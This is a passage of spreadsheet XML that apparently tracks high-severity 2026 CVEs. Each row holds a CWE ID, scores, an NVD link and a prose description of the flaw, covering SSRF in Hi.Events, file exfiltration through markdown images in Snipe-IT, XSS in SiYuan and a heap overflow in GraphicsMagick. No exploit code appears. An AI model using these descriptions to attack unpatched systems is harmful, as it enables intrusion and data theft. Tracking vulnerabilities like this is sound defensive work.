        </is>
      </c>
    </row>
    <row r="1624">
      <c r="A1624" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1624" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76233</t>
        </is>
      </c>
      <c r="C1624" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1624" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1624" s="5" t="inlineStr"/>
      <c r="F1624" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1624" s="5" t="inlineStr"/>
      <c r="H1624" s="5" t="inlineStr"/>
      <c r="I1624" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1624" s="5" t="inlineStr"/>
      <c r="K1624" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L1624" s="5" t="inlineStr">
        <is>
          <t>Renovate versions from 39.53.0 before 40.33.0 contain a command injection vulnerability in the gleam manager where the depName parameter is appended to gleam deps update commands without proper sanitization. Attackers with repository write access can craft malicious gleam.toml files to execute arbitrary commands on the machine running Renovate.</t>
        </is>
      </c>
      <c r="M1624" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76233</t>
        </is>
      </c>
    </row>
    <row r="1625">
      <c r="A1625" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1625" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76838</t>
        </is>
      </c>
      <c r="C1625" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1625" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1625" s="5" t="inlineStr"/>
      <c r="F1625" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1625" s="5" t="inlineStr"/>
      <c r="H1625" s="5" t="inlineStr"/>
      <c r="I1625" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J1625" s="5" t="inlineStr"/>
      <c r="K1625" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1625" s="5" t="inlineStr">
        <is>
          <t>Hi.Events validates a webhook destination only when it is registered, never when it is used. NoInternalUrlRule in backend/app/Validators/Rules/NoInternalUrlRule.php resolves the hostname with gethostbyname() and rejects private and reserved ranges, which any public hostname passes. At dispatch, WebhookDispatchService takes the stored URL and calls it through spatie/laravel-webhook-server without repeating the check, and backend/config/webhook-server.php sets no Guzzle options, so redirect following remains enabled by default. A destination that answers with a redirect to a loopback, private or cloud metadata address therefore causes the server to issue that request, and changing the hostname's DNS record after registration reaches the same result because no resolution is repeated. The response is not discarded: WebhookResponseHandlerService stores the body on the webhook log and WebhookLogResource returns it from the webhook logs endpoint, so the requester reads what the internal service replied rather than inferring it. Both event and organizer webhooks share the rule and the dispatch path. Version 1.11.1-beta revalidates at dispatch, pins the validated address, checks every redirect hop, and decodes IPv6 transition addresses that previously bypassed the filter.</t>
        </is>
      </c>
      <c r="M1625" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76838</t>
        </is>
      </c>
    </row>
    <row r="1626">
      <c r="A1626" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1626" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76878</t>
        </is>
      </c>
      <c r="C1626" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1626" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1626" s="5" t="inlineStr"/>
      <c r="F1626" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1626" s="5" t="inlineStr"/>
      <c r="H1626" s="5" t="inlineStr"/>
      <c r="I1626" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1626" s="5" t="inlineStr"/>
      <c r="K1626" s="5" t="inlineStr">
        <is>
          <t>CWE-688</t>
        </is>
      </c>
      <c r="L1626" s="5" t="inlineStr">
        <is>
          <t>In OpenStack Aodh before 22.0.1, the alarm list API bypasses project scoping when the all_projects query parameter is set to false. The API checks for the presence of the all_projects key rather than its value; a true value enforces the administrator-only policy, but a false value removes the key and skips the branch that normally restricts results to the caller's project. A non-admin user with the reader role can list alarms from all projects, exposing alarm actions containing trust webhook URLs, Heat signal endpoints, project IDs, and user IDs. The parameter can also be combined with a foreign project_id to target a specific project's alarms. A related concern is that OpenStack Watcher does not apply authorization to its webhook trigger endpoint. Any authenticated user who learns an audit's webhook URL, for example from this leaked Aodh alarm metadata, can start an EVENT audit and its associated action plan regardless of their own project or role. The webhook endpoint has lacked policy enforcement since its introduction in the Ussuri release (Watcher 4.0.0).</t>
        </is>
      </c>
      <c r="M1626" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76878</t>
        </is>
      </c>
    </row>
    <row r="1627">
      <c r="A1627" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1627" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77118</t>
        </is>
      </c>
      <c r="C1627" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1627" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1627" s="5" t="inlineStr"/>
      <c r="F1627" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1627" s="5" t="inlineStr"/>
      <c r="H1627" s="5" t="inlineStr"/>
      <c r="I1627" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J1627" s="5" t="inlineStr"/>
      <c r="K1627" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1627" s="5" t="inlineStr">
        <is>
          <t>A heap out-of-bounds write exists in the Photo CD (PCD) decoder of GraphicsMagick. In DecodeImage() (coders/pcd.c), the Huffman delta loop advances its output pointer with q++ after every decoded delta and never checks it against the end of the heap-allocated luma/chroma plane buffers. The pointer is repositioned only when a sync marker introduces a new plane/row; between sync markers the run length is bounded solely by the input.
A crafted PCD file that positions the pointer near the end of a plane and then supplies a long run of deltas with no intervening sync therefore walks the pointer past the end of the allocation and writes through it. Processing an untrusted PCD file — for example with gm convert or gm identify, or through any application linked against libGraphicsMagick — can corrupt heap memory beyond the buffers.</t>
        </is>
      </c>
      <c r="M1627" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77118</t>
        </is>
      </c>
    </row>
    <row r="1628">
      <c r="A1628" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1628" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77827</t>
        </is>
      </c>
      <c r="C1628" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1628" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1628" s="5" t="inlineStr"/>
      <c r="F1628" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1628" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1628" s="5" t="inlineStr"/>
      <c r="I1628" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1628" s="5" t="inlineStr"/>
      <c r="K1628" s="5" t="inlineStr">
        <is>
          <t>CWE-428</t>
        </is>
      </c>
      <c r="L1628" s="5" t="inlineStr">
        <is>
          <t>Maono Link 3.8.13 MaonoAiServices Windows service allows local privilege escalation for a standard user account via improper write privileges in 'C:\ProgramData\Maono'. Fixed in 4.0.80.</t>
        </is>
      </c>
      <c r="M1628" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77827</t>
        </is>
      </c>
    </row>
    <row r="1629">
      <c r="A1629" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1629" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80118</t>
        </is>
      </c>
      <c r="C1629" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1629" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1629" s="5" t="inlineStr"/>
      <c r="F1629" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1629" s="5" t="inlineStr"/>
      <c r="H1629" s="5" t="inlineStr"/>
      <c r="I1629" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1629" s="5" t="inlineStr"/>
      <c r="K1629" s="5" t="inlineStr">
        <is>
          <t>CWE-476, CWE-497, CWE-73</t>
        </is>
      </c>
      <c r="L1629" s="5" t="inlineStr">
        <is>
          <t>PassMark PerformanceTest before 11.1 build 1012, BurnInTest before 11.1 build 1000, and OSForensics before 11.1 build 1016 contain an unauthenticated physical memory disclosure in DirectIo64.sys, reachable by unprivileged local users through a single IOCTL with no caller-identity check. The handler writes a crash-dump-format (PAGEDU64) image of all physical memory to a caller-supplied file path in the SYSTEM context, allowing a standard user to create files in locations they cannot otherwise write and to recover memory belonging to processes of other users. The image is preceded by a header that exposes the kernel loaded-module list, active-process list and PFN database pointers, defeating KASLR. The same handler also dereferences the return value of an internal kernel-structure locator without a NULL check; that locator returns NULL on three distinct failure paths, and a kernel crash results on builds where any of those paths is taken.</t>
        </is>
      </c>
      <c r="M1629" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80118</t>
        </is>
      </c>
    </row>
    <row r="1630">
      <c r="A1630" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1630" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82563</t>
        </is>
      </c>
      <c r="C1630" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1630" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1630" s="5" t="inlineStr"/>
      <c r="F1630" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1630" s="5" t="inlineStr"/>
      <c r="H1630" s="5" t="inlineStr"/>
      <c r="I1630" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1630" s="5" t="inlineStr"/>
      <c r="K1630" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L1630" s="5" t="inlineStr">
        <is>
          <t>An attacker could impersonate the camera and place themselves in a man-in-the-middle or device-emulation position. This permits manipulation of device status responses, observation of application requests, and potential triggering of firmware-update behavior.</t>
        </is>
      </c>
      <c r="M1630" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82563</t>
        </is>
      </c>
    </row>
    <row r="1631">
      <c r="A1631" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1631" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85613</t>
        </is>
      </c>
      <c r="C1631" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1631" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1631" s="5" t="inlineStr"/>
      <c r="F1631" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1631" s="5" t="inlineStr"/>
      <c r="H1631" s="5" t="inlineStr"/>
      <c r="I1631" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1631" s="5" t="inlineStr"/>
      <c r="K1631" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1631" s="5" t="inlineStr">
        <is>
          <t>OpenPanel before 2.3.0 contains a cross-site scripting vulnerability in the unauthenticated favicon proxy endpoint GET /misc/favicon that allows remote attackers to execute scripts by supplying an SVG file URL. Attackers can host malicious SVG files with embedded scripts that execute in the victim's browser on the API origin, enabling same-origin credentialed requests to authenticated endpoints.</t>
        </is>
      </c>
      <c r="M1631" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85613</t>
        </is>
      </c>
    </row>
    <row r="1632">
      <c r="A1632" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1632" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85616</t>
        </is>
      </c>
      <c r="C1632" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1632" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1632" s="5" t="inlineStr"/>
      <c r="F1632" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1632" s="5" t="inlineStr"/>
      <c r="H1632" s="5" t="inlineStr"/>
      <c r="I1632" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1632" s="5" t="inlineStr"/>
      <c r="K1632" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1632" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.6.2 contain an authorization bypass vulnerability in checkout-acceptance report actions when Full Multiple Company Support is enabled. Authenticated users with reports.view permission can enumerate sequential acceptance IDs and soft-delete or trigger reminder emails for acceptances belonging to other companies by exploiting a null check on the legacy users.company_id column.</t>
        </is>
      </c>
      <c r="M1632" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85616</t>
        </is>
      </c>
    </row>
    <row r="1633">
      <c r="A1633" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1633" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85651</t>
        </is>
      </c>
      <c r="C1633" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1633" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1633" s="5" t="inlineStr"/>
      <c r="F1633" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1633" s="5" t="inlineStr"/>
      <c r="H1633" s="5" t="inlineStr"/>
      <c r="I1633" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1633" s="5" t="inlineStr"/>
      <c r="K1633" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1633" s="5" t="inlineStr">
        <is>
          <t>Trigger.dev versions before 4.5.2 fail to validate environment membership during run replay operations, allowing authenticated attackers to inject task runs into arbitrary environments. Attackers can replay their own runs into other organizations' or projects' environments to consume victim resources and pollute run history.</t>
        </is>
      </c>
      <c r="M1633" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85651</t>
        </is>
      </c>
    </row>
    <row r="1634">
      <c r="A1634" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1634" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86502</t>
        </is>
      </c>
      <c r="C1634" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1634" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1634" s="5" t="inlineStr"/>
      <c r="F1634" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1634" s="5" t="inlineStr"/>
      <c r="H1634" s="5" t="inlineStr"/>
      <c r="I1634" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1634" s="5" t="inlineStr"/>
      <c r="K1634" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1634" s="5" t="inlineStr">
        <is>
          <t>In JetBrains IntelliJ IDEA before 2026.2.2 missing TLS and authentication on the IJent gRPC server allowed local code execution on Remote Development hosts</t>
        </is>
      </c>
      <c r="M1634" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86502</t>
        </is>
      </c>
    </row>
    <row r="1635">
      <c r="A1635" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1635" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86741</t>
        </is>
      </c>
      <c r="C1635" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1635" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1635" s="5" t="inlineStr"/>
      <c r="F1635" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1635" s="5" t="inlineStr"/>
      <c r="H1635" s="5" t="inlineStr"/>
      <c r="I1635" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1635" s="5" t="inlineStr"/>
      <c r="K1635" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L1635" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 fail to sanitize the category EULA text field before rendering it in checkout confirmation emails. Attackers with low-privilege permissions can inject markdown image syntax or raw HTML img tags pointing to local files or remote URLs, which the mail auto-embed library resolves server-side and returns as email attachments, exfiltrating sensitive files like .env credentials and enabling SSRF attacks.</t>
        </is>
      </c>
      <c r="M1635" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86741</t>
        </is>
      </c>
    </row>
    <row r="1636">
      <c r="A1636" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1636" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86751</t>
        </is>
      </c>
      <c r="C1636" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1636" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1636" s="5" t="inlineStr"/>
      <c r="F1636" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1636" s="5" t="inlineStr"/>
      <c r="H1636" s="5" t="inlineStr"/>
      <c r="I1636" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1636" s="5" t="inlineStr"/>
      <c r="K1636" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L1636" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to properly sanitize markdown image syntax in note fields, allowing authenticated users to read arbitrary server files and issue server-side HTTP requests. Attackers can submit markdown image syntax in checkout acceptance notes that survive HTML escaping, are expanded by CommonMark parser, and resolved by laravel-mail-auto-embed via file_get_contents or curl, exfiltrating sensitive files like .env containing APP_KEY.</t>
        </is>
      </c>
      <c r="M1636" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86751</t>
        </is>
      </c>
    </row>
    <row r="1637">
      <c r="A1637" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1637" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86819</t>
        </is>
      </c>
      <c r="C1637" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1637" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1637" s="5" t="inlineStr"/>
      <c r="F1637" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1637" s="5" t="inlineStr"/>
      <c r="H1637" s="5" t="inlineStr"/>
      <c r="I1637" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1637" s="5" t="inlineStr"/>
      <c r="K1637" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1637" s="5" t="inlineStr">
        <is>
          <t>Waves Central for macOS contains a local privilege escalation in the privileged helper service. The helper authorizes connecting XPC clients by comparing the caller's code-signing certificate chain for equality with its own, rather than validating the caller against a pinned code requirement (application identifier and Team ID). A local, authenticated user can execute code within the vendor-signed process, satisfy the helper's client check, and cause the helper to execute a script with root privileges. Fixed in 17.0.</t>
        </is>
      </c>
      <c r="M1637" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86819</t>
        </is>
      </c>
    </row>
    <row r="1638">
      <c r="A1638" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1638" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87811</t>
        </is>
      </c>
      <c r="C1638" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1638" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1638" s="5" t="inlineStr"/>
      <c r="F1638" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1638" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1638" s="5" t="inlineStr"/>
      <c r="I1638" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1638" s="5" t="inlineStr"/>
      <c r="K1638" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1638" s="5" t="inlineStr">
        <is>
          <t>SiYuan before v3.8.2 inserts persisted notebook template paths into HTML input value attributes without proper attribute encoding. Attackers can craft malicious template paths that break out of the attribute context and execute JavaScript when a victim opens notebook configuration, enabling same-origin API requests and application state manipulation.</t>
        </is>
      </c>
      <c r="M1638" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87811</t>
        </is>
      </c>
    </row>
    <row r="1639">
      <c r="A1639" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1639" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87813</t>
        </is>
      </c>
      <c r="C1639" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1639" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1639" s="5" t="inlineStr"/>
      <c r="F1639" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1639" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1639" s="5" t="inlineStr"/>
      <c r="I1639" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1639" s="5" t="inlineStr"/>
      <c r="K1639" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1639" s="5" t="inlineStr">
        <is>
          <t>SiYuan before v3.8.2 contains a stored cross-site scripting vulnerability in the Search Assets result list where asset filenames are interpolated into HTML without escaping. Authenticated attackers can craft asset filenames containing malicious markup that executes JavaScript in the victim's browser when searching assets, enabling same-origin API requests and application state manipulation.</t>
        </is>
      </c>
      <c r="M1639" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87813</t>
        </is>
      </c>
    </row>
    <row r="1640">
      <c r="A1640" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1640" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87814</t>
        </is>
      </c>
      <c r="C1640" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1640" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1640" s="5" t="inlineStr"/>
      <c r="F1640" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1640" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1640" s="5" t="inlineStr"/>
      <c r="I1640" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1640" s="5" t="inlineStr"/>
      <c r="K1640" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1640" s="5" t="inlineStr">
        <is>
          <t>SiYuan before v3.8.2 contains a stored cross-site scripting vulnerability in the search asset preview feature that fails to escape indexed asset content before inserting it into the DOM using innerHTML. Attackers who can place crafted text assets in a workspace can execute JavaScript in the SiYuan origin when victims preview the assets, enabling authenticated API requests and workspace manipulation.</t>
        </is>
      </c>
      <c r="M1640" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87814</t>
        </is>
      </c>
    </row>
    <row r="1641">
      <c r="A1641" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1641" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87815</t>
        </is>
      </c>
      <c r="C1641" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1641" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1641" s="5" t="inlineStr"/>
      <c r="F1641" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1641" s="5" t="inlineStr"/>
      <c r="H1641" s="5" t="inlineStr"/>
      <c r="I1641" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1641" s="5" t="inlineStr"/>
      <c r="K1641" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L1641" s="5" t="inlineStr">
        <is>
          <t>SiYuan versions before v3.8.2 contain a path traversal vulnerability in the /api/riff/removeRiffDeck endpoint that fails to validate the deckID parameter. An authenticated administrator can supply path traversal sequences to delete arbitrary .deck and .cards files outside the workspace directory.</t>
        </is>
      </c>
      <c r="M1641" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87815</t>
        </is>
      </c>
    </row>
    <row r="1642">
      <c r="A1642" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1642" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88022</t>
        </is>
      </c>
      <c r="C1642" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1642" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1642" s="5" t="inlineStr"/>
      <c r="F1642" s="5" t="inlineStr"/>
      <c r="G1642" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1642" s="5" t="inlineStr"/>
      <c r="I1642" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1642" s="5" t="inlineStr"/>
      <c r="K1642" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L1642" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in the MongoDB integration for Laravel can cause an array supplied to an explicit equality filter to be interpreted as a query condition rather than as a literal value. This affects the three-argument `where` method when the operator is `=` or `eq`, as well as the `find` and `delete` methods that use that code path. An attacker who can cause an affected application to supply an operator-shaped array to one of these APIs may obtain a document other than the intended target or delete documents beyond the intended target.</t>
        </is>
      </c>
      <c r="M1642" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88022</t>
        </is>
      </c>
    </row>
    <row r="1643">
      <c r="A1643" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1643" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88890</t>
        </is>
      </c>
      <c r="C1643" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1643" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1643" s="5" t="inlineStr"/>
      <c r="F1643" s="5" t="inlineStr"/>
      <c r="G1643" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H1643" s="5" t="inlineStr"/>
      <c r="I1643" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1643" s="5" t="inlineStr"/>
      <c r="K1643" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1643" s="5" t="inlineStr">
        <is>
          <t>OpenPanel through commit cd24bb8 contains an SQL injection vulnerability in the analytics filter builder that fails to validate profile.* filter column identifiers before interpolating them into ClickHouse WHERE clauses. An authenticated attacker with project-scoped read or root export credentials can inject arbitrary ClickHouse SQL to bypass project isolation and read other organizations' analytics data and profile PII via blind boolean oracle techniques.</t>
        </is>
      </c>
      <c r="M1643" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88890</t>
        </is>
      </c>
    </row>
    <row r="1644">
      <c r="A1644" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1644" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19203</t>
        </is>
      </c>
      <c r="C1644" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1644" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1644" s="5" t="inlineStr"/>
      <c r="F1644" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1644" s="5" t="inlineStr"/>
      <c r="H1644" s="5" t="inlineStr"/>
      <c r="I1644" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1644" s="5" t="inlineStr"/>
      <c r="K1644" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L1644" s="5" t="inlineStr">
        <is>
